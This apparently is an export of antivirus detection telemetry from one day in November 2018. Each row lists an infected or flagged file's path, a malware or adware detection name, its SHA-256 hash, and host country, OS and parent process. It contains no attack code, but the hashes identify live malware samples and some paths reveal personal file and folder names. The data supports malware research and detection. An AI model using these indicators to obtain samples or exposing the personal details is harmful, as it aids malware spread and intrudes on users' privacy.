  Row(detection=Row(filename='rdrleakdiag.exe', filepath='\\\\?\\C:\\Windows\\winsxs\\x86_microsoft-windows-r..eak-diagnostic-core_31bf3856ad364e35_6.1.7600.16385_none_5ae7f926deb5de01\\rdrleakdiag.exe', filesize=64000, name='W32/Virut.Gen.#M1.#R1'), hash='695401b52e416577f5c69c153b5bed69d7c47cfcc62e8e3b450c505dac8ed047', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T11:26:27Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-110105-afc2bfd0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6d9d8225\\AVSCAN-20181101-105540-86DD2301\\AVSCAN-20181101-110105-AFC2BFD0', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='ceb41711d9656413e2e7523f1b9c2cf61cd9368c110cea44bc9314cc1e7075b0', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T17:00:50Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='jetupdate.exe', filepath='C:\\Program Files\\JetAudio\\jetUpdate.exe', filesize=512000, name='W32/Ramnit.CD.#M1.#R1'), hash='90864d19d2b2cf26f03973e34c494eafe5889ec522117388f064ec8614bf3c3f', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='JO', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-01T17:19:14Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='b818eb54b8943b689f375c87c8f54abbc05390c2ceaaf737f77be654c732e5f9', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-33\\B818EB54B8943B689F375C87C8F54ABBC05390C2CEAAF737F77BE654C732E5F9', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='b818eb54b8943b689f375c87c8f54abbc05390c2ceaaf737f77be654c732e5f9', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T15:29:30Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-110537-d220f3ec', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6d9d8225\\AVSCAN-20181101-105540-86DD2301\\AVSCAN-20181101-110537-D220F3EC', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='ceb41711d9656413e2e7523f1b9c2cf61cd9368c110cea44bc9314cc1e7075b0', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T17:05:23Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='a0500515.exe', filepath='C:\\System Volume Information\\_restore{3CA38AA8-B9A6-4ED4-AE21-93E70EB4803E}\\RP1220\\A0500515.exe', filesize=1768000, name='TR/Patched.Gen.#M300.#R2947'), hash='8bbd5bcc59566245477e24d3760bc4ec864d49d1a62f471d5694424c8f6afa25', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T05:15:38Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='hudaib_mahdi.doc', filepath='C:\\Users\\X\\Documents\\5.1 6.1 7.1 8.1\\Deckblätter_6_1_2HJ_16_17\\Hudaib_Mahdi.doc', filesize=64000, name='HEUR/Macro.Downloader.AMCY.Gen.#M1.#R1'), hash='c89191aaa50f54417f9c8b348b859e9751cf0111ede5a3a84640a60937d83296', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe23_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe23 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-01T16:24:38Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='eb60460fbc534f7854a7b0b6c43560b1557ef302fdd6234df3cb48ed855b80a6', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-31\\EB60460FBC534F7854A7B0B6C43560B1557EF302FDD6234DF3CB48ED855B80A6', filesize=768000, name='PUA/SoftPulse.aone.#M1.#R1'), hash='eb60460fbc534f7854a7b0b6c43560b1557ef302fdd6234df3cb48ed855b80a6', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-36.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-31.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-32.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-33.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-34.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-35.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-01T14:33:52Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-141512-06565300', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_103c7217\\AVSCAN-20181101-141146-DA744C4C\\AVSCAN-20181101-141512-06565300', filesize=376000, name='PUA/MyWebSearch.ME.1.#M300.#R6777'), hash='a36c690c41d2651fe6a2e5f9d785ac213521e3b62107bb5a7b6b4ee4372a5b75', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T13:15:13Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='powerdata.exe', filepath='K:\\HBCD\\Programs\\POWERDATA.EXE', filesize=64000, name='TR/Siggen.64000.3.#M1.#R1'), hash='55ef4bb343cacd348db91d63b011d0d8004df3db4cf79d0abbfefbe248e9491c', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='K:\\HBCD\\PStart.exe', parentsize=786952, timestamp='2018-11-01T17:00:57Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='similar photo cleaner', filepath='/Library/Application Support/Malwarebytes/MBAM/Quarantine/Similar Photo Cleaner.app/Contents/MacOS/Similar Photo Cleaner', filesize=2060000, name='OSX/GT32SupportGeeks.ulklb.#M0.#R0'), hash='b68cee5ada77bb3450bd274dc23196ca5e1b7f03a4fa18e7a68112a3163a9680', metadata=Row(cmdline=None, country='US', os_name='MacOS', os_vmajor='18', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T21:16:20Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='flashupdate (1).exe', filepath='C:\\Users\\X\\Documents\\Downloads\\flashupdate (1).exe', filesize=1536000, name='TR/CoinMiner.CY.#M1.#R1'), hash='53f241e48edce037f68543a11c57cf05e084d97d6dc173ac163fec4d9fd50b02', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='BA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-01T20:24:29Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='nyimbo pnc.exe', filepath='E:\\NYIMBO PNC.exe', filesize=512000, name='HEUR/AGEN.1008018.#M1.#R1'), hash='c329456623265a3676200f3b521b2c82fbd504cb49f8487bb72520d5edfddc15', metadata=Row(cmdline=None, country='CD', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2972672, timestamp='2018-11-01T08:36:01Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='filesplitterjoiner.exe', filepath='K:\\HBCD\\Programs\\FILESPLITTERJOINER.EXE', filesize=64000, name='BDS/Rogue.766118.#M1.#R1'), hash='ebf5f18b65c3440e24aa171c5a8f60d8321e55351b8dddf02022f102f94c45de', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='K:\\HBCD\\PStart.exe', parentsize=786952, timestamp='2018-11-01T17:01:04Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='trze8fa.tmp', filepath='\\\\?\\C:\\Users\\X\\AppData\\Roaming\\Tebar\\trzE8FA.tmp', filesize=576000, name='HEUR/AGEN.1000001.#M1.#R1'), hash='e61aaa0a238a2c9b976f9846f760fa8a377f48f081e36344e557b09068c79af2', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T18:46:01Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='libraries.pif', filepath='C:\\Users\\X\\Libraries\\Libraries.pif', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='55685aaf75eebc41927a2e99221f4f25d786af0339148d83a3bf552f468f6532', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe3_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe3 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-01T07:36:18Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-201455-a8dc8b05', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3856b854\\AVSCAN-20181101-201440-A5D6BE00\\AVSCAN-20181101-201455-A8DC8B05', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T19:14:51Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-094540-b371cf11', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_0ba84ba0\\AVSCAN-20181101-093304-2ED7EA8B\\AVSCAN-20181101-094540-B371CF11', filesize=576000, name='ADWARE/Adware.Gen.#M1.#R1'), hash='44c0c5164f0b6d2f8d70425e6155357d4cb010b35e9dc39236dc383d7045d0d3', metadata=Row(cmdline=None, country='UA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:45:35Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='tmp000af604', filepath='C:\\Windows\\Temp\\tmp00000296\\tmp000af604', filesize=8932000, name='PUA/WinThruster.EL.1.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\ITbrain\\AntiMalware\\ITbrain_AntiMalware_Service.exe', parentsize=5719344, timestamp='2018-11-01T10:51:10Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='8396f6400c35a0c89e1e4e96d5323c173eea9a93', filepath='\\\\?\\c:\\users\\X\\appdata\\local\\temp\\2\\8396f6400c35a0c89e1e4e96d5323c173eea9a93', filesize=2944000, name='TR/Crypt.EPACK.Gen2.#M300.#R100627'), hash='369e82ed6d1929e1e846ac2b2cea485a8434fb4043412bf35559b4840907e760', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T13:10:47Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='dxa3be0.tmp', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\dxa3BCF.tmp\\dxa3BE0.tmp', filesize=768000, name='PUA/Fusion.IB.#M1.#R1'), hash='0c129ee14f00a11b1dd41569b567a5985d55f78bd7fca000fc66a5ef9e97d7dc', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-01T10:30:53Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T07:09:13Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='intel 825xx gigabit platform lan network device diagnostics utility.exe', filepath='E:\\Programs\\Compressed\\all drivers for dell Latitude E6510\\winXP\\Intel 825xx Gigabit Platform LAN Network Device Diagnostics Utility.exe', filesize=14336000, name='TR/Crypt.XPACK.Gen3.#M300.#R200074'), hash='0d05e19585bd9b7f82de846ec143fe7aaf1ab4069fb796c2d129a890970d8f5a', metadata=Row(cmdline=None, country='IQ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-01T16:09:47Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T01:02:08Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T19:23:30Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='tqipumsmu20xl0l.exe', filepath='\\\\?\\C:\\Program Files (x86)\\ygn1ku2lzbx\\TQIPUMSMU20XL0L.exe', filesize=192000, name='TR/Dropper.Gen.#M300.#R4133'), hash='7e9a1e14fc752e1248e08fe96dfdcab7cd3fc9f568b000813f0c527348a86140', metadata=Row(cmdline=None, country='KE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T15:08:46Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='smartbar.communication.dll', filepath='C:\\Program Files\\LPT\\Smartbar.Communication.dll', filesize=20000, name='PUA/Linkury.Gen2.#M300.#R101296'), hash='797bc2e1605894671f47c6ea764651c13c25d19586e546839a16308566618432', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\LPT\\srpts.exe', parentsize=32288, timestamp='2018-11-01T09:15:50Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T00:50:01Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='3ce845b71def4059502be3b85b3db4e1ec327bd04cffb0c62fe92ad57482fbca', metadata=Row(cmdline='-k LocalServiceAndNoImpersonation', country='SA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-01T09:57:43Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-174623-092e4489', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_43647be6\\AVSCAN-20181101-174608-0718C19F\\AVSCAN-20181101-174623-092E4489', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='ES', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T16:46:25Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='inv.48.vs(v5.5) шаблон за 4 квартал 2011.xls', filepath='D:\\СОФТ\\ФЛЕШКА\\надежда\\тарифная\\шаблоны с ЕИАС\\мониторинг водоснабжения эжеквартально до 25 числа после квартала\\INV.48.VS(v5.5) шаблон за 4 квартал 2011.xls', filesize=768000, name='X2000M/Agent.3997.#M1.#R1'), hash='31ce23a877a9932f7b3c03b458fa8bc8fe52f7e00599ddd704e64f3027e4e9ee', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe3_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe3 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-01T17:36:43Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='setup_winthruster_2016.exe', filepath='\\\\?\\C:\\Users\\X\\OneDrive\\文件\\Setup_WinThruster_2016.exe', filesize=8932000, name='TR/Decep.PCfighter.6547.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T04:17:40Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='dealplylive.exe', filepath='\\\\?\\C:\\Program Files (x86)\\DealPlyLive\\Update\\DealPlyLive.exe', filesize=148000, name='ADWARE/DealPly.Gen4.#M300.#R300171'), hash='5f456982046db60202faa8a29d13eb84860f00a648b39919dded52111b130275', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T19:22:18Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-132131-423b984a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_eeace4ec\\AVSCAN-20181101-112728-76DE2F84\\AVSCAN-20181101-132131-423B984A', filesize=324000, name='VBS/Ramnit.abcd.#M1.#R1'), hash='81bfc5a8598ba347731651e8000a533d9e35b04a70617101f77c8b2c7960e694', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-01T06:21:37Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='savepass 1.1-bho64.dll', filepath='\\\\?\\C:\\Program Files (x86)\\SavePass 1.1\\SavePass 1.1-bho64.dll', filesize=940000, name='ADWARE/CrossRider.Gen.#M300.#R5892'), hash='15ee2676c95b45800892ec5873aee229893ff4d19cfd133f2e8e02683b37e2c7', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-01T15:00:27Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181102-090840-1c28a0bd', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_9aa61a38\\AVSCAN-20181101-224711-AF384F40\\AVSCAN-20181102-090840-1C28A0BD', filesize=8932000, name='TR/Decep.PCfighter.6547.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:33:41Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T19:04:46Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='84614cc721f205fe9501ff4db51dd627080dc5b834069ae170060c9da58d07a2', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-01T09:10:45Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='yet_another_cleaner_sfto_5_6_105[2].exe', filepath='C:\\Users\\X\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\17JQY51F\\yet_another_cleaner_sfto_5_6_105[2].exe', filesize=10176000, name='ADWARE/ELEX.Gen7.#M300.#R603048'), hash='38836464c46123df502e8eee33db2bac0db830646c6edd13a4203db79d33ebd5', metadata=Row(cmdline='\\\\\\/monitor', country='LB', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc='C:\\Program Files\\CCleaner\\CCleaner64.exe', parentsize=8418584, timestamp='2018-11-01T17:00:27Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='a0007758.exe', filepath='\\\\?\\K:\\System Volume Information\\_restore{956F9782-0BB2-43F5-A11C-7A8F8AD2E548}\\RP5\\A0007758.EXE', filesize=512000, name='W32/Sality.Patched.#M1.#R1'), hash='3ee59d568621261420d37f41e45aa2a4bfe246a5caafbd1070362d13a8da18d9', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T16:12:57Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='tesi master da consegnare.exe', filepath='E:\\Didattica\\Sgb\\condivisa\\SORZI\\TUTTO STORICO\\TESI MASTER DA CONSEGNARE.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='dbbba6122f8e506938da13a7b6a38c765c4600d8db1ef90d90e2c97600adb0b1', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:08:29Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-102428-9ff4f9e3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_020258d0\\AVSCAN-20181101-102348-9BDBB77F\\AVSCAN-20181101-102428-9FF4F9E3', filesize=512000, name='TR/Drop.Agen.757760.#M1.#R1'), hash='8d08f3a333a6cf026bb243fada0682650b148d58949dc6a48714268893873c03', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T03:24:28Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='pureset.exe', filepath='C:\\Program Files\\Pure Codec\\Codecs\\PureSet.exe', filesize=384000, name='W32/Sality.AT.#M1.#R1'), hash='b84666be3d52db8bda3cb3ecce95becbb4620ccc0644a852889a04a1f54204db', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T20:55:05Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-094600-1087296d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_318d9040\\AVSCAN-20181101-093330-80B14946\\AVSCAN-20181101-094600-1087296D', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T02:46:07Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='ahcremind.exe', filepath='C:\\Program Files (x86)\\Adobe\\Adobe Help Center\\ahcremind.exe', filesize=1536000, name='W32/Sality.AT.#M1.#R1'), hash='96f08671316f9e0a3ff2eacb8273a2040f637780957944228323bab549132c9f', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T03:56:49Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-151423-31d60593', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3db4e496\\AVSCAN-20181101-145735-7096FD0F\\AVSCAN-20181101-151423-31D60593', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:14:30Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='corso tintolavanderia docenti.exe', filepath='E:\\Didattica\\Sgb\\condivisa\\SORZI\\TUTTO STORICO\\chiavetta engim 2017\\MODULI ENGIM\\CORSI FORMAZIONE ADULTI\\corso tintolavanderia docenti.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='dbbba6122f8e506938da13a7b6a38c765c4600d8db1ef90d90e2c97600adb0b1', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:10:15Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='animatore sociale.exe', filepath='E:\\Didattica\\Sgb\\condivisa\\SORZI\\TUTTO STORICO\\chiavetta engim 2017\\MODULI ENGIM\\CORSI FORMAZIONE ADULTI\\SOCIO SANITARI\\ANIMATORE SOCIALE.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='dbbba6122f8e506938da13a7b6a38c765c4600d8db1ef90d90e2c97600adb0b1', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:13:20Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='schede ultime aprile 2016.exe', filepath='E:\\Didattica\\Sgb\\condivisa\\SORZI\\TUTTO STORICO\\chiavetta engim 2017\\MODULI ENGIM\\CORSI NUOVI DEFINIITIVI\\schede presentazione corsi\\schede ultime APRILE 2016.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='dbbba6122f8e506938da13a7b6a38c765c4600d8db1ef90d90e2c97600adb0b1', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:15:08Z'), dt=datetime.date(2018, 11, 1)),
